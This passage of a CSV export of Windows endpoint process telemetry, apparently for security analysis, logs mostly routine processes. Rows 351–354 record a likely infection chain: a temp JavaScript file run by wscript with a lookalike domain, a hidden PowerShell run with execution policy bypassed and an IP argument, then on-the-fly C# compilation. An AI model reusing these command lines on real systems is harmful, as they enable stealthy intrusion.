Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
+351,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:10.599816700+00:00,18532,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 238262471",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,0639b0a6f69b3265c1e42227d650b7d1,ce9f70e104c07d92fc05fbd6000839fd6a87ff010e706396f87dd679244ed97b,545ec11dee642de633eb2c6f6ffc90cce4decf8d,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,"wscript  ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_298ae488e59b4e9ff2badd92011032024fc2e393.js"" page.googledocpage.com/ 1 ",False,2021-06-23 03:08:19.930804700+00:00,19856,\Device\HarddiskVolume3\Windows\System32\cmd.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:10.695416600+00:00,2021-06-23 03:14:03.927400700+00:00,092af722-6080-48ba-87a8-351926d01c7c,computerpii_0a470890c60768167990033d701e7bd881398861,161055,False,10.7740.19041.1052,False,11540474045172986,,11540474045173010,2021-06-23 03:08:20.325598500+00:00,3840,2021-06-23 03:08:20.325598500+00:00,wscript.exe,3840,256,ActiveProcessStartkey,C:\Windows\System32,170496,2001-02-26 12:33:54+00:00,2019-12-07 09:09:07.254980200+00:00,2021-06-23 03:08:20.364393400+00:00,2019-12-07 09:09:07.254980200+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft ® Windows Script Host,5.812.10240.16384,wscript.exe,wscript.exe,Microsoft ® Windows Based Script Host,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+352,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:10.641831400+00:00,10484,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:12:10.599816700+00:00,18532,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 238262471",False,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:10.700071800+00:00,2021-06-23 03:14:03.927433500+00:00,aeba471d-4a55-4d1b-959d-885fd9a2a1a0,computerpii_0a470890c60768167990033d701e7bd881398861,161056,False,10.7740.19041.1052,False,11540474045173010,,11540474045173011,2021-06-23 03:12:10.599816700+00:00,18532,2021-06-23 03:12:10.599816700+00:00,powershell.exe,18532,256,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 03:12:10.688732+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+353,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:11.245732500+00:00,12564,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\lb5rjchq.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:12:10.599816700+00:00,18532,powershell.exe,"""powershell.exe"" -w Hidden -ep Bypass -file ""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_4af465eb4ec83ac8e168ff1d34590ffde46406b7.ps1"" Ipv4PII_34efea060f868c5f5bc11a7a04255476d926f4b7/ss 238262471",False,2021-06-23 03:08:20.325598500+00:00,3840,wscript.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:11.465384400+00:00,2021-06-23 03:14:03.933757300+00:00,008c6c73-50fd-4a1f-978b-099f92843ffd,computerpii_0a470890c60768167990033d701e7bd881398861,161082,False,10.7740.19041.1052,False,11540474045173010,,11540474045173012,2021-06-23 03:12:10.599816700+00:00,18532,2021-06-23 03:12:10.599816700+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,18532,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-23 03:12:10.688732+00:00,2020-10-09 20:48:24.470101200+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+354,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 03:12:11.334992300+00:00,18060,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\FilePII_08c91dc83646bdd48448b9d2f6dd651b1c6954b8.tmp"" ""c:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\FilePII_9451f5eefbd1684915a721887c7ec5c60176fc9e.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 03:12:11.245732500+00:00,12564,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Temp\lb5rjchq.cmdline""",False,2021-06-23 03:12:10.599816700+00:00,18532,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 03:12:11.467038300+00:00,2021-06-23 03:14:03.933797400+00:00,176462ed-ad26-4ab1-8902-ccfbb062b02f,computerpii_0a470890c60768167990033d701e7bd881398861,161083,False,10.7740.19041.1052,False,11540474045173012,,11540474045173013,2021-06-23 03:12:11.245732500+00:00,12564,2021-06-23 03:12:11.245732500+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,12564,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-23 03:01:19.425920800+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+355,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:07:35.184305700+00:00,10844,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey C3DB183A-3EC6-ACE9-0BD9-869ECDF0CF7C ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:07:36.048718500+00:00,2021-06-23 07:09:13.563683300+00:00,a55bd6f3-8522-422a-a1f3-568547eec044,computerpii_0a470890c60768167990033d701e7bd881398861,164984,False,10.7740.19041.1052,False,11540474045145394,,11540474045174057,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+356,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:21:48.759177400+00:00,7824,identity_helper.exe,"""identity_helper.exe"" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1988,3446608907217918886,11874100668059788691,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9312 /prefetch:8",PortableExecutable,2021-06-18 23:49:38.664048500+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\91.0.864.54\identity_helper.exe,1080720,33098278b86f6e967f5e0f66da8192fa,dbe0ea072c1e26f07ae34f6b721074635048644ef14fce622e4097f05b6684c2,c345ea4721c3bafc8f7592f97f0407541b464904,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.015515900+00:00,20024,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:21:49.122322500+00:00,2021-06-23 01:23:34.562514400+00:00,6b120a81-f831-4ca1-8396-f2986bd344b0,computerpii_0a470890c60768167990033d701e7bd881398861,157849,False,10.7740.19041.1052,False,11540474045171833,,11540474045172362,2021-06-23 00:51:42.015515900+00:00,20024,2021-06-23 00:51:42.015515900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,20024,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 00:51:42.099396700+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+357,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f6a98158746a5fdbbe076bfb040a7f1343dd8f7d.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:02.341865+00:00,2021-06-23 01:23:34.563699100+00:00,e0a9f4a7-13f9-4151-8e9e-a2cd8e4616ea,computerpii_0a470890c60768167990033d701e7bd881398861,157874,False,10.7740.19041.1052,False,11540474045171845,,11540474045172364,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,OUTLOOK.EXE,16176,256,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+358,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:02.594298100+00:00,16580,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xdgwtj 3",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,3780296,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.809284200+00:00,4496,AGMService.exe,"""AGMService.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:02.620161100+00:00,2021-06-23 01:23:34.563829500+00:00,da4592e4-7a11-4e18-97cf-29edb34afd12,computerpii_0a470890c60768167990033d701e7bd881398861,157877,False,10.7740.19041.1052,False,11540474045136991,,11540474045172365,2021-06-10 00:46:11.809284200+00:00,4496,2021-06-10 00:46:11.809284200+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,4496,16512,ActiveProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-10 00:46:11.815741100+00:00,2020-09-22 19:30:00+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service
+359,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:02.619792100+00:00,15784,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,b962838258223f9ef7b648ac2950cd52,7e9c31ec2647a23bb6115de7c7374047ba3b147bb414f9a692116f9ceb62f90d,70c1a02d0838945f4a9024c6b5ff14f85be0cdd6,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:02.594298100+00:00,16580,AGMService.exe,"""AGMService.exe"" \\.\pipe\gc_pipe_xdgwtj 3",False,2021-06-10 00:46:11.809284200+00:00,4496,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:02.882361800+00:00,2021-06-23 01:23:34.563919300+00:00,89d2589d-3bef-4c03-8fe9-9eb024db779c,computerpii_0a470890c60768167990033d701e7bd881398861,157879,False,10.7740.19041.1052,False,11540474045172365,,11540474045172366,2021-06-23 01:22:02.594298100+00:00,16580,2021-06-23 01:22:02.594298100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe,16580,18560,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3780296,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-23 00:53:46.229988300+00:00,2020-09-22 19:30:00+00:00,18560,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,0.0,,,,,,,,,Invalid,Unknown,Valid,OsVendor,"Adobe Systems, Incorporated",Adobe Genuine Software Service,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,Adobe Genuine Software Service,AGMService.exe,Adobe Genuine Software Service,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+360,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:22:02.993337400+00:00,18520,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe633_ Global\UsGthrCtrlFltPipeMssGthrPipe633 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon"" ",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:03.047080200+00:00,2021-06-23 01:23:34.564100800+00:00,8fba7c64-a6cf-480e-b86c-79760f66c255,computerpii_0a470890c60768167990033d701e7bd881398861,157883,False,10.7740.19041.1052,False,11540474045144190,,11540474045172369,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft 